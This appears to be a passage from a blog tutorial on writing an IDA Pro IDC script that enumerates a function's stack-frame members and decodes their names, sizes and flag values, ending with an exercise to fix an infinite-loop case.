First of all I need to get the function frame structure. I use GetFrame, it returns the id of the function frame structure. It’s the first information to retrieve because you need the id when you’ll have to deal with the internal fields of the structure. Once you have the id you can start scanning the entire structure from the first till the last item. GetFirstMember and GetLastMember functions give you the first and the last offset. At this point you can retrieve all the information you need, in this example I get name, size and flag value from every item. The functions I used are GetMemberName, GetMemberSize and GetMemberFlag; pretty intuitive and easy to use. An output line will look like:

ObjectAttributes 24 60000400

where name=ObjectAttributes, size=24 and flag=60000400. Which kind of information are hidden inside the flag value? idc.idc file contains all the necessary definitions:
#define FF_DATA 0x00000400L // Data ?
#define FF_STRU 0x60000000L // Struct ?

The field contains data and it’s a structure (OBJECT_ATTRIBUTES). And, what about Handle field?

Handle 4 25500400

Browsing idc.idc file you’ll get:
#define FF_DATA 0x00000400L // Data ?
#define FF_0OFF 0x00500000L // Offset?
#define FF_1OFF 0x05000000L // Offset?
#define FF_DWRD 0x20000000L // dword

Ok, there’s only a little behaviour to fix inside the script. Run the script and you’ll see some repeated lines, here’s a snippet taken from the output:

...
ObjectAttributes 24 60000400
ObjectAttributes 24 60000400
ObjectAttributes 24 60000400
KeyValueInformationLength 4 20000400
KeyValueInformationLength 4 20000400
KeyValueInformationLength 4 20000400
KeyValueInformationLength 4 20000400
ResultLength 4 20000400
ResultLength 4 20000400
ResultLength 4 20000400
...

Ida repeats the field information on every byte of the field itself. To display only one item per field you can update the ‘i’ variable inside the for statement, add the next line after the Message instruction:
i = i + GetMemberSize(id, i) - 1;

The example ends here. It works almost fine, but it goes into an infinite loop with certain functions. From what I’ve seen the problem occours when Ida is not able to understand which kind of variable has been declared. Look at this simple example:

...
INIT:BF9B0786 var_1A4 = dword ptr -1A4h
INIT:BF9B0786 var_18E = byte ptr -18Eh
INIT:BF9B0786 var_4 = dword ptr -4
...

var_18E is marked as byte but there’s a big gap between var_18E and var_4. Stack frame windows reveals an interesting thing:

-0000018E var_18E db ?
-0000018D db ? ; undefined
-0000018C db ? ; undefined
-0000018B db ? ; undefined
-0000018A db ? ; undefined
-00000189 db ? ; undefined
-00000188 db ? ; undefined
-00000187 db ? ; undefined
-00000186 db ? ; undefined
-00000185 db ? ; undefined
-00000184 db ? ; undefined
-00000183 db ? ; undefined

var_18E length is 394 byte and as you can see Ida doesn’t collapse the definition into a single line, but it “explodes” the variable through the 394 bytes.
How can you solve this problem? You can use my initial script adding some more checks. Nothing hard of course, you have all the necessary functions, just use your brain defining a good algo. Hint: take a look at the value returned by GetMemberSize.

Once you have a working script you can extend it covering all the declared functions and filtering the information you’ll get.

Good luck and let me know if you are not able to solve this exercize!!!

« Previous PageNext Page »